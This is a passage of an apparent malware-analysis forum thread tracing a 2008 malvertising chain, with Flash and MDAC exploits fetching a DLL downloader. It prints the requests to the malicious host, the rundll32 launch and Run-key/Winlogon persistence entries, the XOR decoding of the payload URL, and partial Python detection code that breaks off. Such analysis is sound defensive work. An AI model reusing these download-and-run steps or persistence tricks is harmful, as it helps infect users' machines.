changed: hostmaster@ripe.net 20080625
source: RIPE

organisation: ORG-STIL1-RIPE
org-name: Still Trade Ltd
org-type: OTHER
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
e-mail: corp@still-trade.com
mnt-ref: RU-WEBALTA-MNT
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080624
source: RIPE

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Information related to '91.208.0.0/24AS47486'

route: 91.208.0.0/24
descr: Still Trade Ltd
origin: AS47486
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080625
source: RIPE
______________________________

Information related to '220.192.0.0 - 220.207.255.255'

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY1446-AP
tech-c: JY1446-AP
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20070731
changed: hm-changed@apnic.net 20070802
source: APNIC

person: Jin Yang
address: No.133,Taiyun Building,Xidan North Street
address: Xicheng District,Beijing,China
country: CN
phone: +86-10-66505588
fax-no: +86-10-66504252
e-mail: ip_address@cnuninet.com
nic-hdl: JY1446-AP
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20070828
source: APNIC

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY7-CN
tech-c: JY7-CN
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CN-UNICOM
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20071010
source: CNNIC

person: Jin Yang
nic-hdl: JY7-CN
e-mail: ip_address@cnuninet.com
address: No.133,Taiyun Building,Xidan North Street, Xicheng District,Beijing,China
phone: +86-10-66505588
fax-no: +86-10-66504252
country: CN
changed: ipas@cnnic.net.cn 20070927
mnt-by: MAINT-CNNIC-AP
source: CNNIC

220.196.0.0/17
AS9800 CHINAUNICOM BACKBONE No 133,Xi'dan North Street Beijing 100032

<h4>
e-statistic.com
</h4>
Found in a referer during a redirect to scanner.vavscan.com
CODE
GET /stats.php?site=[removed]&adv=[removed] HTTP/1.1
Accept: */*
Referer: http://scanner.vavscan.com/[removed]/[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: srv1.e-statistic.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Sat, 19 Jul 2008 16:28:08 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: keep-alive

e-statistic.com - 207.226.175.78

Website Title: 403 Forbidden
Registry Data
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-12-05
Expires: 2008-12-05
Updated: 2008-02-07
Name Server: NS1.E-STATISTIC.COM (has 1 domains)
Name Server: NS2.E-STATISTIC.COM
Whois Server: whois.publicdomainregistry.com

Server Type: nginx/0.5.33
IP Address: 207.226.175.78
IP Location - Virginia - Mc Lean - Beyond The Network America Inc
Response Code: 403
Dedicated Hosting: e-statistic.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: E-STATISTIC.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Kimberly
<h4>
Exploiting redirects in Flash content
</h4>
Today I did spend some time reading network captures related to my recent rotator.adjuggler.com case and I discovered 2 new swf files served through advertising.

Network traces.

We notice an advertisement on the main page of www.saazy.com
CODE
<div class="ad_300x250">
<!-- BEGIN 300X250 -->
<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2">
<script language=JavaScript src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vj?z=terp517&dim=300757&pos=2&abr=$scriptiniframe"></script>
<noscript><a href="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/cc?z=terp517&pos=2">
<img src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vc?z=terp517&dim=300757&pos=2&abr=$imginiframe" width="300" height="250" border="0">
</a></noscript></iframe>
<!-- END 300X250 -->
</div>
Let's follow the consecutive redirects ...
CODE
GET http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.saazy.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: rotator.adjuggler.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1222876 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://count4.exitexchange.com/exit/1159049?3387160 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1222876
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE
GET http://30.ath.cx/viewpost.php?pid=25 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1159049?3387160
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Host: 30.ath.cx
At 30.ath.cx we stumble on some obfuscated code. Besides the usual Internet Explorer MDAC and Microsoft XML Core Services exploits, we notice a part dedicated to Flash. The installed Flash version is tested and, according to the result, either i47.swf or i115.swf will be used.
IPB Image
______________________________

What does i47.swf or i115.swf do ?

Upon "execution / analysis" they try to access the Internet, as seen below, in order to download a file from 60.ath.cx which will be saved as c:\boot.bak
IPB Image
CODE
GET /up.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:11:08 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Cache-Control: private
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 33280
Content-Disposition: inline; filename=set.css
Connection: close
Content-Type: application/octet-stream
Once saved, the file will be executed by rundll32.exe because boot.bak is a DLL:
CODE
rundll32 c:\boot.bak,DllCanUnloadNow
IPB Image
boot.bak reveals some interesting stuff as seen in the packet stream. We can see some loading points and additional files to download.
IPB Image
______________________________

Visible loading points using HijackThis.
O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKUS\S-1-5-18\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'Default user')
O20 - Winlogon Notify: SysBackup - c:/boot.bak
______________________________

c:\boot.bak

Once loaded by rundll32.exe, list.php will be requested from the server. This file will be saved as C:\Documents and Settings\[username]\Cookies\site.yahoo.txt
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent a URL ... but I'm unable to confirm this right now.
CODE
GET /list.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:03 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 61
Connection: close
Content-Type: text/html
The next step is to request 554.exe from 60.ath.cx which will be saved as C:\Documents and Settings\[username]\Cookies\0.exe
CODE
GET /files/554.exe HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
Last-Modified: Sat, 26 Jul 2008 14:40:29 GMT
ETag: "13a4459-1ae00-452ee4586d140"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close
Content-Type: application/x-msdownload
0.exe will be executed by c:\boot.bak
IPB Image
______________________________

After reboot.

Once the computer has rebooted, c:\boot.bak is loaded under the winlogon process and it will then launch 0.exe present on our HDD.
IPB Image
Files will be updated as "rundll32.exe" downloads list.php, followed by the executable, from the Internet again.
If I'm not mistaken, this method *could* allow loading whatever executable on boot without changing anything in the registry once boot.bak is in place. Putting the files into the Cookies folder is a nifty trick too, as they will be considered "harmless" by the average user.
______________________________

SWF Files.

When it comes to ActionScript code, i47.swf and i115.swf are identical. The addFrameScript() method is used to dynamically add a frame script.
IPB Image
i47.swf has 4 tags while i115.swf only has 3 tags.
IPB Image IPB Image
The files are very difficult to analyse but the shellcode *might* again be hidden in the image as seen in the Kaspersky write-up.

<h4>
VirusTotal results
</h4>
Filename: ie_update.exe

This is the file from the Internet Explorer MDAC / Microsoft XML Core Services exploit. It performs the same actions as the Flash Files.

File size: 1024 bytes
MD5...: 4e6a301eb75586afdb4f2465aaf90fcb
SHA1..: 3f72fc5c1650b7ede99df39b9ac915f2197b0229
PEiD..: -
QUOTE
File ie_update.exe received on 07.26.2008 16:47:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.25 -
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Win32.KME.Based.1.Gen
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.25 -
F-Secure 7.60.13501.0 2008.07.26 W32/Downloader
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 W32/Downloader
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 suspected of Win32.Trojan.Downloader (http://...)
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -
______________________________

Filename: i47.swf

File size: 728 bytes
MD5...: 8c802fa1e22eb006def9b1df88f951c5
SHA1..: 751388f93da81188753e88050a36b9dd2066152d
SHA256: ea7e7f288f9d0125c5cb911ba4ea8d8a45fbe442fc864b71ad5568f9bc7c9481
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i47.swf received on 07.26.2008 20:14:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 Hack.Exploit.Swf.a
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen
______________________________

Filename: i115.swf

File size: 754 bytes
MD5...: c7c21d95ffb6aaa3cc18a546803786fc
SHA1..: 5105810716e3d1816e02c81ca9310df01298b6c4
SHA256: 798225306d0c9c504c74c7ed57315220b97bd78bccab84890503d495c52763b7
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i115.swf received on 07.26.2008 20:14:53 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Bloodhound.Exploit.193
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen
______________________________

Filename: boot.bak

File size: 110080 bytes
MD5...: b826aecb029962edbd771d149a920b21
SHA1..: a5ac9997a59ec1d227c0d708f9aacd8b5d33ffb4
SHA256: bf026894ea43cbcad39f554476dc1847cdec0cdb76e9161a1095c56a0a8c689f
PEiD..: -
QUOTE
File boot.bak received on 07.27.2008 00:59:17
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.26 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.26 -
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.27 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.27 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.27 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.27 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -
______________________________

Filename: 0.exe

File size: 33280 bytes
MD5...: 47d6acb7d79d7790da02b9fbd809eacb
SHA1..: 638f76a93cb6fc35c9a33e4a8b6d2971fd381411
SHA256: 7945086ac43c55423c44de4328ac41cef0e0143d597c98873d0f1f3941212ba6
PEiD..: -
QUOTE
File 0.exe received on 07.26.2008 20:15:47 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 HEUR/Crypted
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.25 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Worm:Win32/Nuwar.KE
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 Malicious Software
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Packed.Generic.174
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Heuristic.Crypted
<h4>
Update on site.yahoo.txt
</h4>
QUOTE
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent a URL ... but I'm unable to confirm this right now.

Thanks to MAD I can now confirm it does contain the URL of the file to download. Such a technique could make you download a different file tomorrow and run it on your computer without having to modify anything related to startup settings, since the file is loaded by boot.bak.

Inside the stream capture of boot.bak (cf. http://www.bluetack.co.uk/Kimberly/Logs/swf232.jpg) we notice a string called "sobaka-barabaka". Further analysis of boot.bak reveals the following portion of code:
CODE
10002C98   push    offset "sobaka-barabaka"   ; key string
10002C9D   lea     eax, [ebp+var_3FC]          ; local buffer handed to the decoder
10002CA3   push    eax
10002CA4   call    dec0de                      ; decoding routine (name given by the analyst)
Note: the above is only a small snippet and it does not represent the complete decoding procedure (UrlDecoded).

We can call sobaka-barabaka a "key" to decode the string inside list.php aka site.yahoo.txt. The following reference table will come in handy for people who are not familiar with conversions.
CODE
char -> decimal -> hex -> octal -> binary
s -> 115 -> 0x73 -> 163 -> 1110011
o -> 111 -> 0x6F -> 157 -> 1101111
b -> 98 -> 0x62 -> 142 -> 1100010
a -> 97 -> 0x61 -> 141 -> 1100001
k -> 107 -> 0x6B -> 153 -> 1101011
a -> 97 -> 0x61 -> 141 -> 1100001
...
...
Got the principle of conversion? Let's move on to decoding then. Our string is
21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304
We leave aside the 2 in front of the chain and keep the rest.
1B1B1611514E0254515C00160945020B40040807045E4D5447554C041304
Being a hex representation, the chain is decoded two characters at a time using the "key".
key: s -> 115 -> 0x73 -> 163 -> 1110011
part: 1B
decode: 0x73^0x1B=0x68

0x68 in hex represents 104 in ASCII, which represents the letter h
To decode the string, a loop is needed until all hex chars are processed. Below is the illustration / result of the decoding procedure.
CODE
0x73^0x1B:0x68 -> h
0x6F^0x1B:0x74 -> t
0x62^0x16:0x74 -> t
0x61^0x11:0x70 -> p
0x6B^0x51:0x3A -> :
0x61^0x4E:0x2F -> /
0x2D^0x02:0x2F -> /
0x62^0x54:0x36 -> 6
0x61^0x51:0x30 -> 0
0x72^0x5C:0x2E -> .
0x61^0x00:0x61 -> a
0x62^0x16:0x74 -> t
0x61^0x09:0x68 -> h
0x6B^0x45:0x2E -> .
0x61^0x02:0x63 -> c
0x73^0x0B:0x78 -> x
0x6F^0x40:0x2F -> /
0x62^0x04:0x66 -> f
0x61^0x08:0x69 -> i
0x6B^0x07:0x6C -> l
0x61^0x04:0x65 -> e
0x2D^0x5E:0x73 -> s
0x62^0x4D:0x2F -> /
0x61^0x54:0x35 -> 5
0x72^0x47:0x35 -> 5
0x61^0x55:0x34 -> 4
0x62^0x4C:0x2E -> .
0x61^0x04:0x65 -> e
0x6B^0x13:0x78 -> x
0x61^0x04:0x65 -> e
Which gives us http://60.ath.cx/files/554.exe
This file will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

Special thanks fly out to MAD for confirming my initial thought of this being a link.
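The XOR walk-through above, re-implemented as an added example (this is not code from Kimberly's post or from boot.bak itself): it decodes the hex chain served by list.php with the "sobaka-barabaka" key, can re-encode a URL the same way, and prints the same per-byte trace as the table above so each row can be checked. The one assumption is that the leading "2" of the chain carries no data; the post simply discards it, and so does decode_list_php().

```python
# Added example, not code from the original post or from the malware:
# re-implements the XOR decoding the post walks through by hand for the
# hex chain served by list.php (saved as site.yahoo.txt), keyed with the
# "sobaka-barabaka" string found in boot.bak.
# Assumption: the leading "2" of the chain carries no data; the post
# discards it and decode_list_php() does the same.

KEY = b"sobaka-barabaka"

# Hex chain exactly as it appears in the post.
LIST_PHP_CHAIN = "21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304"


def xor_decode(hex_chain, key=KEY):
    """Decode two hex characters at a time: byte i is XORed with key[i mod len(key)]."""
    if len(hex_chain) % 2:
        raise ValueError("hex chain must have an even number of characters")
    data = bytes.fromhex(hex_chain)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode("ascii")


def xor_encode(text, key=KEY):
    """Inverse operation; XOR is an involution, so the same loop serves both directions."""
    data = text.encode("ascii")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex().upper()


def decode_list_php(chain, key=KEY):
    """Drop the leading character as the post does, then decode the remainder."""
    return xor_decode(chain[1:], key)


def decode_trace(hex_chain, key=KEY):
    """Per-byte trace in the post's 'key^byte:result -> char' layout, for checking by eye."""
    data = bytes.fromhex(hex_chain)
    rows = []
    for i, b in enumerate(data):
        k = key[i % len(key)]
        rows.append(f"0x{k:02X}^0x{b:02X}:0x{k ^ b:02X} -> {chr(k ^ b)}")
    return rows


if __name__ == "__main__":
    print("\n".join(decode_trace(LIST_PHP_CHAIN[1:])))
    print(decode_list_php(LIST_PHP_CHAIN))   # http://60.ath.cx/files/554.exe
```

Feeding the full chain, leading "2" included, to xor_decode() raises a ValueError because of the odd length; that is a cheap sanity check that the prefix really was stripped before decoding.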
Kimberly
<h4>
ie_update.exe & i47.swf & i115.swf - A small demonstration
</h4>
ie_update.exe, i47.swf and i115.swf all perform the same task: download 60.ath.cx/up.php, save the file as c:\boot.bak and run the file.

Since it's extremely difficult to work with the SWF files, I chose ie_update.exe instead in order to show you the "embedded" link and the actions taken.

Below we see the use of urlmon.URLDownloadToFileA. This function will be used to download our file and save it as c:\boot.bak.
In the hex dump, we already notice the URL
IPB Image
Let's follow the CALL EAX a bit closer. Screenshot below is "inside" urlmon.dll. We clearly see our two actors, 60.ath.cx/up.php and c:\boot.bak
IPB Image
Once our file is downloaded, kernel32.WinExec is called. Once past that call, we get the prompt from ProcessGuard that ie_update.exe wants to start c:\boot.bak using rundll32.exe (boot.bak being a DLL)
IPB Image
The same actions are performed with i47.swf & i115.swf.
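The rundll32 launch of c:\boot.bak shown here, and the HijackThis O4/O20 loading points listed in the previous post, share the same tell: a module with a non-DLL extension sitting in the root of the drive. The added example below (not from Kimberly's post, and not a HijackThis feature) scans HijackThis-style log lines for rundll32 autoruns and Winlogon Notify entries and flags exactly that. The log format is assumed from the lines quoted in the thread, the two benign entries are constructed for contrast, and the heuristics (non-DLL extension, drive root, Cookies/Temp folders) are the author's own choice.

```python
# Added example, not code from the original post or from HijackThis:
# flags rundll32 autoruns and Winlogon Notify entries whose module looks
# wrong (non-DLL extension, drive root, browser cache or temp folder).
# Log format assumed from the O4/O20 lines quoted in the thread.
import ntpath
import re

# Constructed sample: the five entries from the post plus two benign
# entries invented here for contrast.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKUS\S-1-5-18\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'Default user')
O20 - Winlogon Notify: SysBackup - c:/boot.bak
O4 - HKLM\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O20 - Winlogon Notify: Schedule - C:\WINDOWS\system32\wlnotify.dll
"""

DLL_EXTS = {".dll", ".cpl", ".ocx", ".ax"}   # what rundll32 / Winlogon normally load
CACHE_DIRS = ("\\cookies\\", "\\temp\\", "\\temporary internet files\\")

O4_RE = re.compile(r"^O4 - (?P<hive>\S+): \[(?P<name>[^\]]*)\] (?P<cmd>.*?)(?: \(User '[^']*'\))?$")
O20_RE = re.compile(r"^O20 - Winlogon Notify: (?P<name>\S+) - (?P<path>.+)$")


def _norm(path):
    """Lower-case, strip quotes and use backslashes so c:/boot.bak and c:\boot.bak compare equal."""
    return path.strip().strip('"').replace("/", "\\").lower()


def _rundll32_module(cmd):
    """Return (module, entry) when cmd launches rundll32, else None."""
    m = re.match(r'^"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(?P<rest>.+)$', cmd, re.I)
    if not m:
        return None
    module, _, entry = m.group("rest").partition(",")
    return _norm(module), entry.strip() or None


def _module_findings(path):
    """Heuristics on the module path; an empty list means nothing suspicious."""
    p = _norm(path)
    head, tail = ntpath.split(p)
    ext = ntpath.splitext(tail)[1]
    reasons = []
    if ext not in DLL_EXTS:
        reasons.append(f"non-DLL extension '{ext or '(none)'}' loaded as a module")
    if re.fullmatch(r"[a-z]:\\?", head):
        reasons.append("module sits in the root of the drive")
    if any(d in p for d in CACHE_DIRS):
        reasons.append("module sits in a browser cache / temp folder")
    return reasons


def scan_hijackthis(log_text):
    """Return one finding dict per suspicious O4 rundll32 entry or O20 Winlogon Notify entry."""
    findings = []
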